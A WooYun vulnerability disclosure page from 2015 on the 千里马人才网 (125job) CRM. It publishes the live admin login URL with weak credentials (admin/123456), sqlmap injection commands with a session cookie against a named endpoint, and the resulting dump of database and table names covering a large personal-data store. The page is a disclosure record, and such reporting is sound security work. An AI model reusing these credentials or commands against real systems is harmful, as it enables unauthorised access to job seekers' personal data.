当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135732

漏洞标题:千里马人才网某漏洞导致可泄露百万人才库&SQL注射

相关厂商:千里马人才网

漏洞作者: 懒人

提交时间:2015-08-21 09:48

修复时间:2015-10-05 09:50

公开时间:2015-10-05 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://crm.125job.com/login
账号:admin
密码:123456

1.png


1.png


2.png


3.png


4.png


点击编辑用户,可以直接进用户个人中心

5.png


6.png


7.png


sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --dbs--cookie SiteAccess=a3bf4f7355086552a8ee259294184085


8.png


sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --tables crm --cookie SiteAccess=a3bf4f7355086552a8ee259294184085


Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: crm
[135 tables]
+---------------------------------------+
| crm_activitylist                      |
| crm_corporation_reviews               |
| crm_feedback                          |
| crm_notepad                           |
| crm_resultslist                       |
| crm_shopwindow                        |
| crm_shopwindowlist                    |
| dsafdf                                |
| duo_baoming                           |
| duo_card_list                         |
| duo_helps                             |
| duo_invest                            |
| duo_job_corporation_ok                |
| duo_jobs_topset                       |
| duo_jobs_visited                      |
| duo_log_editcorbase                   |
| duo_manage_radio                      |
| duo_pinlun                            |
| duo_qqapi                             |
| duo_sitejob_list                      |
| duo_sms_log                           |
| duo_taobao_pic                        |
| duo_weiboapi                          |
| huodong_guaguale_hastime              |
| huodong_guaguale_list                 |
| huodong_hrtest                        |
| huodong_jinli                         |
| huodong_sevenyear                     |
| huodong_snakeyearp                    |
| huodong_turntable                     |
| huodong_weijianli                     |
| job_accessing                         |
| job_adposition                        |
| job_adservice                         |
| job_advertise                         |
| job_advertise_apprise                 |
| job_advertisepos                      |
| job_age                               |
| job_age_job                           |
| job_age_person                        |
| job_application                       |
| job_apprise                           |
| job_class                             |
| job_com_tel                           |
| job_com_viseted                       |
| job_comment                           |
| job_corporation                       |
| job_corporation_appriseaccess         |
| job_corporation_basis                 |
| job_corporation_extenscontact         |
| job_corporation_giveuplog             |
| job_corporation_groups                |
| job_corporation_jobs                  |
| job_corporation_logins                |
| job_corporation_manager               |
| job_corporation_message               |
| job_corporation_pic                   |
| job_corporation_plan                  |
| job_corporation_sale                  |
| job_corporation_search                |
| job_corporation_services              |
| job_corporation_sms                   |
| job_corporation_smspaylog             |
| job_datum                             |
| job_en_person                         |
| job_gbooks                            |
| job_giveuplog                         |
| job_hh_case                           |
| job_hh_corporation_job                |
| job_hh_person                         |
| job_investigate                       |
| job_ip                                |
| job_jobscontent_example               |
| job_journal                           |
| job_links                             |
| job_mail                              |
| job_mail_host                         |
| job_mailorder                         |
| job_manager                           |
| job_manager_count                     |
| job_manager_radio                     |
| job_msg                               |
| job_news                              |
| job_news_special                      |
| job_notice                            |
| job_oa_corporation                    |
| job_oa_gbook                          |
| job_person                            |
| job_person_ability                    |
| job_person_authenticate               |
| job_person_basis                      |
| job_person_book                       |
| job_person_card                       |
| job_person_edu                        |
| job_person_education                  |
| job_person_expand                     |
| job_person_file                       |
| job_person_garner                     |
| job_person_general                    |
| job_person_haswork                    |
| job_person_intention                  |
| job_person_jifen                      |
| job_person_job                        |
| job_person_journal                    |
| job_person_letter                     |
| job_person_logs                       |
| job_person_mailorder                  |
| job_person_manager_merge              |
| job_person_merge                      |
| job_person_pugong                     |
| job_person_remark                     |
| job_person_search                     |
| job_person_spending                   |
| job_person_training                   |
| job_person_work                       |
| job_pseron_otherinfo                  |
| job_search                            |
| job_sitejob                           |
| job_sitejoblog                        |
| job_statistics                        |
| job_tag                               |
| job_tagged                            |
| job_talent                            |
| job_viewlogperson                     |
| job_weather                           |
| job_web_var                           |
| job_wei                               |
| job_windows                           |
| job_wish                              |
| job_worker                            |
| job_zhaoping_live                     |
| job_zhuanchang                        |
| weixin_config                         |
| weixin_keyword                        |
| zhuangpan_person                      |
+---------------------------------------+
[22:02:33] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 327 times
[22:02:33] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Des
ktop\SqlMap\SQLMAP~1\Bin\output\crm.125job.com'
[*] shutting down at 22:02:33
[root@Hacker~]# Sqlmap ^A

漏洞证明:

修复方案:

修改弱口令,过滤特殊字符

版权声明:转载请注明来源 懒人@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)